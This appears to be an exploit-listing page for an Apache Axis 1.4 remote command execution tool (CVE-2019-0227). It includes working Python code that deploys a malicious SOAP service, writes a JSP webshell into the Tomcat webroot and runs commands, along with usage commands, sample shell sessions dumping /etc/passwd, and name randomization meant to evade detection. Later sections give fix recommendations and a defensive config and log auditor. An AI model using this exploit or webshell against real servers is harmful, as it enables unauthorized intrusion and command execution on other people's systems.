## https://sploitus.com/exploit?id=371B14AC-8018-52E8-89C5-302C7B59C44F
# Apache Axis 1.4 CVE-2019-0227 Remote Command Execution Exploitation Tool
A Python tool for exploiting the remote command execution chain (CVE-2019-0227) in Apache Axis 1.4. Supports **randomized service names and Webshell filenames**, automated deployment, and interactive command execution.
## Vulnerability Description
Apache Axis 1.4 ships an `AdminService` SOAP endpoint that accepts WSDD deployment descriptors. When the `enableRemoteAdmin` property is set to `true`, that endpoint accepts deployments from any client (otherwise only from localhost), so an attacker can deploy a malicious service whose request flow includes an `org.apache.axis.handlers.LogHandler` pointed at a file under the Tomcat webroot. Invoking the service makes the handler write the request message, which carries JSP code, into that file, yielding a Webshell and arbitrary command execution on the target server. Note that CVE-2019-0227 itself is catalogued as an SSRF in the Axis 1.4 distribution (the bundled `StockQuoteService.jws` example can be made to issue requests to `localhost`, reaching `AdminService` even when remote administration is disabled); this tool does not use that SSRF step and instead requires `AdminService` to be reachable directly.
**Affected versions**: Apache Axis <= 1.4 (1.4, released in 2006, is the last 1.x release)
**Trigger condition**: `enableRemoteAdmin` set to `true`
## Features
- **Automated deployment**: Deploys the malicious service and writes the Webshell in one run
- **Random naming**: Generates a fresh random service name and Webshell filename on each run
- **Interactive Shell**: Supports executing multiple commands consecutively
- **Basic authentication**: Supports targets configured with `adminPassword`
- **Pure Python**: Low-footprint, easy to use
- **Signature evasion**: Randomized names defeat static detection rules keyed on fixed service or file names; they do not hide the `AdminService` deployment request or the new `.jsp` file itself
## Installation and Dependencies
### Environment Requirements
- Python 3.7+
- requests library
### Install Dependencies
```bash
pip install requests urllib3
```
## Quick Start
### Basic Usage
```bash
# Upload only the Webshell (automatically generates random service names and filenames)
python3 axis_exp.py -u http://target.com:8080/axis/
# Execute a single command
python3 axis_exp.py -u http://target.com:8080/axis/ -c "whoami"
# Interactive Shell mode
python3 axis_exp.py -u http://target.com:8080/axis/ -i
```
### Authentication Usage
If the target is configured with `adminPassword`, you need to add the authentication parameter:
```bash
# Single command with authentication
python3 axis_exp.py -u http://target.com:8080/axis/ -U admin -P admin -c "id"
# Interactive Shell with authentication
python3 axis_exp.py -u http://target.com:8080/axis/ -U admin -P admin -i
```
## Vulnerability Exploitation Process
```
Step 1: Deploy the malicious service through AdminService
  POST /axis/services/AdminService
  -> Create RandomService (its request flow runs the RandomLog handler on every call)
  -> Create RandomLog handler (LogHandler writing to ../webapps/ROOT/shell.jsp)
        |
        v
Step 2: Invoke RandomService to write the Webshell
  POST /axis/services/RandomService
  -> RandomLog handler fires
  -> The JSP code carried in the request is written to shell.jsp
        |
        v
Step 3: Access the Webshell to execute commands
  GET /shell.jsp?c=whoami
  -> The server executes `whoami` and returns the result
```
1. **Random naming**: Generates a random service name (8 characters) and Webshell filename (6 characters) each time it runs.
2. **Deploy the malicious service**: Posts a WSDD deployment to `AdminService` that defines the service and a `LogHandler` configured to write to the chosen file.
3. **Write the Webshell**: Invokes the malicious service so the handler logs the request, writing the JSP Webshell code to the target server.
4. **Execute commands**: Requests the Webshell with `GET`, passing the command in a query-string parameter (the flow above shows it as `c`; confirm the parameter name against the JSP template embedded in the script).
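The three steps above, written out as an added example. This is not the tool's own code: it builds the two SOAP requests the flow describes (the WSDD deployment with a `LogHandler`, and the service invocation carrying the JSP inside CDATA) and, in `exploit()`, sends them. The handler and service names, the JSP body, the `c` query parameter and the `../webapps/ROOT/` path are assumptions chosen for illustration.

```python
import secrets
import string
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import escape

# Added example, not the tool's own code. It builds (and, in exploit(), sends)
# the requests in the three-step flow. The handler/service names, the JSP
# body, the `c` parameter and the ../webapps/ROOT/ path are assumptions.
WSDD_NS = "http://xml.apache.org/axis/wsdd/"
JAVA_NS = "http://xml.apache.org/axis/wsdd/providers/java"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
ALPHABET = string.ascii_lowercase + string.digits

# Minimal JSP that executes the value of the `c` query parameter.
JSP_SHELL = (
    '<%@ page import="java.io.*" %>'
    '<% String c = request.getParameter("c"); if (c != null) {'
    ' Process p = Runtime.getRuntime().exec(c);'
    ' BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));'
    ' String l; while ((l = r.readLine()) != null) out.println(l); } %>'
)


def random_name(length):
    """Lowercase alphanumeric name that starts with a letter (8 characters for
    the service, 6 for the shell file, as the README describes)."""
    return secrets.choice(string.ascii_lowercase) + "".join(
        secrets.choice(ALPHABET) for _ in range(length - 1))


def soap_envelope(body_xml):
    return ('<soapenv:Envelope xmlns:soapenv="%s"><soapenv:Body>%s'
            '</soapenv:Body></soapenv:Envelope>' % (SOAP_NS, body_xml))


def build_deploy_wsdd(service, handler, file_name):
    """Step 1 payload for AdminService: a LogHandler whose LogHandler.fileName
    points under the webroot, and a service whose request flow runs it.
    The provider class is arbitrary; the handler fires before it is invoked."""
    return (
        '<deployment xmlns="%s" xmlns:java="%s">'
        '<handler name="%s" type="java:org.apache.axis.handlers.LogHandler">'
        '<parameter name="LogHandler.fileName" value="%s"/>'
        '<parameter name="LogHandler.writeToConsole" value="false"/>'
        '</handler>'
        '<service name="%s" provider="java:RPC">'
        '<requestFlow><handler type="%s"/></requestFlow>'
        '<parameter name="className" value="java.util.Random"/>'
        '<parameter name="allowedMethods" value="*"/>'
        '</service></deployment>'
        % (WSDD_NS, JAVA_NS, handler, escape(file_name, {'"': "&quot;"}),
           service, handler)
    )


def build_trigger_body(service, jsp=JSP_SHELL):
    """Step 2 payload: invoke the new service with the JSP wrapped in CDATA so
    the envelope stays well-formed XML. LogHandler writes the raw SOAP text to
    the file; the JSP engine treats everything outside <% %> as template text."""
    return ('<ns:main xmlns:ns="urn:%s"><ns:in0><![CDATA[%s]]></ns:in0></ns:main>'
            % (service, jsp))


def deployed_service_name(wsdd):
    """Parse a deployment descriptor and return its service name."""
    return ET.fromstring(wsdd).find("{%s}service" % WSDD_NS).get("name")


def well_formed(xml_text):
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


def exploit(axis_base, user=None, password=None):
    """Run all three steps against axis_base (e.g. http://host:8080/axis) and
    return the webshell URL. Network access happens only when this is called."""
    import requests  # listed dependency; imported lazily so the builders run without it
    s = requests.Session()
    if user is not None:
        s.auth = (user, password)  # HTTP Basic for a configured adminPassword
    headers = {"Content-Type": "text/xml", "SOAPAction": '""'}
    svc, shell = random_name(8), random_name(6)
    wsdd = build_deploy_wsdd(svc, svc + "Log", "../webapps/ROOT/%s.jsp" % shell)
    r = s.post(axis_base + "/services/AdminService",
               data=soap_envelope(wsdd), headers=headers, timeout=15)
    r.raise_for_status()
    # LogHandler.invoke() only records a start time on its first call and logs
    # on later ones (or on a fault), so the trigger is sent twice.
    trigger = soap_envelope(build_trigger_body(svc))
    for _ in range(2):
        s.post(axis_base + "/services/" + svc, data=trigger, headers=headers, timeout=15)
    # The file lands in the same Tomcat's ROOT context, so it is served on the
    # same scheme, host and port as the Axis application.
    u = urlsplit(axis_base)
    return "%s://%s/%s.jsp" % (u.scheme, u.netloc, shell)
```

The relative `../webapps/ROOT/` path resolves against the JVM's working directory, which is Tomcat's `bin/` when started through `catalina.sh`; a target started differently needs the path adjusted.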
## Example Usage
### Interactive Shell Demonstration
```bash
$ python3 axis_exp.py -u http://192.168.1.100:8080/axis/ -i
============================================================
Axis1.4 CVE-2019-0227 Vulnerability Exploitation Tool
Target: http://192.168.1.100:8080/axis
Service Name: x7k2m9pq
Webshell: http://192.168.1.100/x7k2m9.jsp
============================================================
[*] Malicious service deployed: x7k2m9pq
[+] Service deployment successful: x7k2m9pq
[*] Webshell written: x7k2m9.jsp
[+] Webshell writing completed: x7k2m9.jsp
[+] Vulnerability exploited successfully!
[+] Webshell URL: http://192.168.1.100/x7k2m9.jsp
[*] Enter the interactive shell (exit by typing 'exit').
x7k2m9$ whoami
www-data
x7k2m9$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
x7k2m9$ pwd
/var/lib/tomcat9/webapps/ROOT
x7k2m9$ uname -a
Linux target 5.4.0-26-generic #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020 x86_64 GNU/Linux
x7k2m9$ exit
[*] Exited
```
### Demonstration of Single Command Execution
```bash
$ python3 axis_exp.py -u http://192.168.1.100:8080/axis/ -c "cat /etc/passwd"
============================================================
Axis1.4 CVE-2019-0227 Vulnerability Exploitation Tool
Target: http://192.168.1.100:8080/axis
Service Name: a3f8k2m1
Webshell: http://192.168.1.100/b9d4e2.jsp
============================================================
[*] Malicious service deployed: a3f8k2m1
[+] Service deployment successful: a3f8k2m1
[*] Webshell written: b9d4e2.jsp
[+] Webshell writing completed: b9d4e2.jsp
[+] Vulnerability exploited successfully!
[+] Webshell URL: http://192.168.1.100/b9d4e2.jsp
[*] Executed command: cat /etc/passwd
--------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
--------------------------------------------------
```
### Randomization Feature Demonstration
Each run generates different service names and filenames:
| Number of Runs | Service Name | Webshell File Name |
|--------------|-----------------|-----------------|
| 1st Run | `x7k2m9pq` | `x7k2m9.jsp` |
| 2nd Run | `a3f8k2m1` | `b9d4e2.jsp` |
| 3rd Run | `n5p7r3t8` | `q2w4r6.jsp` |
## Notes
1. **Exploitation prerequisite**: The `enableRemoteAdmin` property of the target Axis service must be set to `true`; otherwise `AdminService` accepts deployments only from localhost.
2. **Authentication**: If `adminPassword` is configured on the target, provide the correct username and password with the `-U` and `-P` parameters.
3. **Path**: The script defaults to writing the webshell to `../webapps/ROOT/`. The relative path resolves against the JVM's working directory (Tomcat's `bin/` when started via `catalina.sh`, which is why `..` reaches `webapps/`); adjust the `LogHandler.fileName` parameter in the `deploy()` method if the target's layout differs. Because the file lands in the same Tomcat instance's `ROOT` context, it is served on the same host and port as the Axis application.
4. **Randomization**: Random service names and filenames only defeat WAF or log-monitoring rules that match fixed names; the `AdminService` deployment POST, the invocation of the new service and the `.jsp` requests all remain in the access logs.
5. **For authorized testing only**: Do not use this tool without authorization.
## Vulnerability Fixing Recommendations
1. Set `enableRemoteAdmin` to `false` (check both `globalConfiguration` and the `AdminService` entry in `server-config.wsdd`), and replace the default `adminPassword` of `admin` with a strong value.
2. Comment out or remove the `AdminServlet`-related configuration in `web.xml`, and the `AdminService` entry in `server-config.wsdd`, if remote deployment is not needed.
3. Configure access control to restrict which sources can reach `/services/AdminService`.
4. Remove unnecessary example files (such as `StockQuoteService.jws`, the SSRF vector that lets the localhost-only restriction be bypassed).
5. Axis 1.4 (2006) is the last 1.x release: migrate to Axis2, build Axis 1.x from its source repository where fixes continue to land, or use another WebService framework.
6. Monitor logs for `AdminService` requests, especially POSTs from addresses other than localhost, and for new `.jsp` files appearing under `webapps/ROOT`.
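A defender-side counterpart to recommendations 1, 2 and 6 above, as an added example that is not part of the tool or its README: it audits an Axis 1.x `server-config.wsdd` for remote administration, the default password and a deployed `AdminService`, and scans Tomcat access-log lines for deployment traffic. The weak and hardened configuration snippets and the log lines are constructed for illustration; the parameter names (`enableRemoteAdmin`, `adminPassword`) are Axis's own.

```python
import re
import xml.etree.ElementTree as ET
from ipaddress import ip_address

# Added defensive example, not part of the tool. It checks an Axis 1.x
# server-config.wsdd for recommendations 1 and 2 and scans Tomcat access-log
# lines for recommendation 6. Both config snippets and the log lines are constructed.
WSDD_NS = "http://xml.apache.org/axis/wsdd/"
NS = {"w": WSDD_NS}

# Weak: remote admin on, default password, AdminService deployed.
WEAK_CONFIG = """<deployment xmlns="http://xml.apache.org/axis/wsdd/"
            xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
 <globalConfiguration>
  <parameter name="adminPassword" value="admin"/>
  <parameter name="enableRemoteAdmin" value="true"/>
 </globalConfiguration>
 <service name="AdminService" provider="java:MSG">
  <parameter name="allowedMethods" value="AdminService"/>
  <parameter name="className" value="org.apache.axis.utils.Admin"/>
 </service>
</deployment>"""

# Hardened: remote admin off, password changed, AdminService entry removed.
HARDENED_CONFIG = """<deployment xmlns="http://xml.apache.org/axis/wsdd/"
            xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
 <globalConfiguration>
  <parameter name="adminPassword" value="Qv7!pL2#mZ9r"/>
  <parameter name="enableRemoteAdmin" value="false"/>
 </globalConfiguration>
</deployment>"""


def _params(elem):
    return {p.get("name"): p.get("value") for p in elem.findall("w:parameter", NS)}


def audit_server_config(wsdd_xml):
    """Return a list of findings. enableRemoteAdmin is read from
    globalConfiguration and overridden by the AdminService entry if that sets
    it too, since Axis resolves service options before engine-wide ones."""
    root = ET.fromstring(wsdd_xml)
    findings = []
    glob = root.find("w:globalConfiguration", NS)
    gparams = _params(glob) if glob is not None else {}
    remote_admin = gparams.get("enableRemoteAdmin", "false")
    admin_svc = None
    for svc in root.findall("w:service", NS):
        if svc.get("name") == "AdminService":
            admin_svc = svc
            remote_admin = _params(svc).get("enableRemoteAdmin", remote_admin)
    if remote_admin.strip().lower() == "true":
        findings.append("enableRemoteAdmin=true: AdminService accepts deployments from any client")
    if admin_svc is not None:
        findings.append("AdminService is deployed: remove the entry unless remote deployment is required")
    if gparams.get("adminPassword") == "admin":
        findings.append("adminPassword is the default value 'admin'")
    elif "adminPassword" not in gparams:
        findings.append("adminPassword is not configured")
    return findings


# Common Log Format lines as written by Tomcat's AccessLogValve (constructed).
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Mar/2024:10:00:01 +0000] "POST /axis/services/AdminService HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2024:10:00:05 +0000] "POST /axis/services/AdminService HTTP/1.1" 200 734',
    '203.0.113.7 - - [10/Mar/2024:10:00:06 +0000] "POST /axis/services/x7k2m9pq HTTP/1.1" 500 388',
    '203.0.113.7 - - [10/Mar/2024:10:00:07 +0000] "GET /x7k2m9.jsp?c=whoami HTTP/1.1" 200 41',
    '198.51.100.9 - - [10/Mar/2024:10:00:09 +0000] "GET /axis/services HTTP/1.1" 200 1200',
]
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def suspicious_admin_posts(lines):
    """(ip, timestamp, status, remote) for every POST to AdminService.
    remote=True means a non-loopback client, which a hardened deployment should
    never see; loopback POSTs are kept because the SSRF route arrives that way."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].split("?")[0].endswith("/services/AdminService"):
            continue
        remote = not ip_address(m["ip"]).is_loopback
        hits.append((m["ip"], m["ts"], m["status"], remote))
    return hits
```

In the sample log the remote `AdminService` POST is followed within seconds by a POST to a previously unseen service name and a `GET` for a new `.jsp` at the webroot; that sequence, not the random names themselves, is what a detection rule should key on.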
## Frequently Asked Questions
### Q: Why does it show an HTTP 401 error?
A: The target has configured `adminPassword`. Use the `-U admin -P password` parameters for authentication.
### Q: Why does it show an HTTP 403 error?
A: The target does not have `enableRemoteAdmin` enabled. Check the target configuration.
### Q: The webshell writes successfully, but no output appears?
A: Possible reasons:
- The command produces no output (e.g., `touch /tmp/test`)
- Issues with the target system's environment variables (try the full path, such as `/bin/whoami`)
- JSP compilation errors (check the Tomcat logs)
### Q: How do I change the webshell writing path?
A: Edit the `deploy()` method in the script and modify the `LogHandler.fileName` parameter value.
## Disclaimer
This tool is used solely for security research and authorized testing purposes. Using this tool to attack a target system is illegal. The user shall bear all legal responsibilities. **Do not use it for illegal purposes!**